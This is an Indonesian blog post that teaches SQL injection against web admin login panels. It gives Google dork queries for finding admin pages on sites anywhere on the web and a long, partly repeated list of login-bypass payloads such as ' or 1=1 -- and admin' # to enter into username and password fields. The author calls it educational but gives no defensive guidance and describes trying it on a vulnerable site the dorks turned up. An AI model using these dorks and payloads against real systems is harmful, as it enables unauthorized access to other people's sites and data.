SQL Injection Ke Admin Panel

Hacking

SQL Injection adalah salah satu teknik exploit dengan memanfaatkan kelemahan pada database. Pada umumnya ini di inject ( suntik) kedalam form yang membutuhkan input dari user, misalnya buku tamu, komentar, login user , login admin dll.

Kali ini saya akan membagi pengetahuan untuk melakukan injection ke login admin, saya tulis disini sebagai pembelajaran saja agar rekan rekan lebih aware ke keamanan databasenya. Segala resiko tanggung jawab sendiri ya, sekali lagi saya hanya menyajikan dalam kerangka edukasi.

Saya gunakan teknik yang paling sederhana yaitu menggunakan Google Dork di Google Hacking Database, untuk menemukan sasaran yang vulnerable.

Okay..google dork yang kita akan pakai ada beberapa antara lain , cobain sendiri ya :

  • nurl:manager intitle:Admin Panel
  • inurl:/admin2/ ext:php inurk:/admin/ ext:php
  • inurl:/adminpanel/ ext:php
  • inurl:/admin_panel/
  • inurl:/login.php
  • inurl:/admin.php
  • inurl:/admin
  • inurl:/login.html

Nah kita asumsikan sudah mendapatkan admin login , maka kita tinggal coba memasukkan kombinasi rangkaian user dan password sebagai injection nya.

User Name Password
‘ or 1=1 limit 1 — -+ ‘ or 1=1 limit 1 — -+
“‘ OR 1=1 “ “‘ OR 1=1 LIMIT 1”
admin ‘ or ‘1’=’1
admin ‘ or ‘1’=’1
‘ or ‘x’=’x
‘ or 0=0 —
” or 0=0 —
or 0=0 —
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’=’x
” or “x”=”x
‘) or (‘x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’=’a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 —
hi’ or 1=1 —
‘or’1=1’
==
and 1=1–
and 1=1
‘ or ‘one’=’one–
‘ or ‘one’=’one
‘ and ‘one’=’one
‘ and ‘one’=’one–
1’) and ‘1’=’1–
admin’ —
admin’ #
admin’/*
or 1=1–
or 1=1#
or 1=1/*
) or ‘1’=’1–
) or (‘1’=’1–
‘ or ‘1’=’1
‘ or ‘x’=’x
‘ or 0=0 —
” or 0=0 —
or 0=0 —
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’=’x
” or “x”=”x
‘) or (‘x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’=’a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 —
hi’ or 1=1 —
‘or’1=1’

Banyak amat yak ? Hahaha namanya juga mencari kelemahan supaya bisa di exploit jadi caranya ya trial and error, melakukan hacking nomor satu butuh kesabaran.

Ahaa saya coba hasil googlingan tadi , sepertinya saya menemukan salah satu yang vulnerable , kita coba masuk dengan kombinasi user and password diatas

Semoga Bermanfaat

Leave a Reply

Your email address will not be published. Required fields are marked *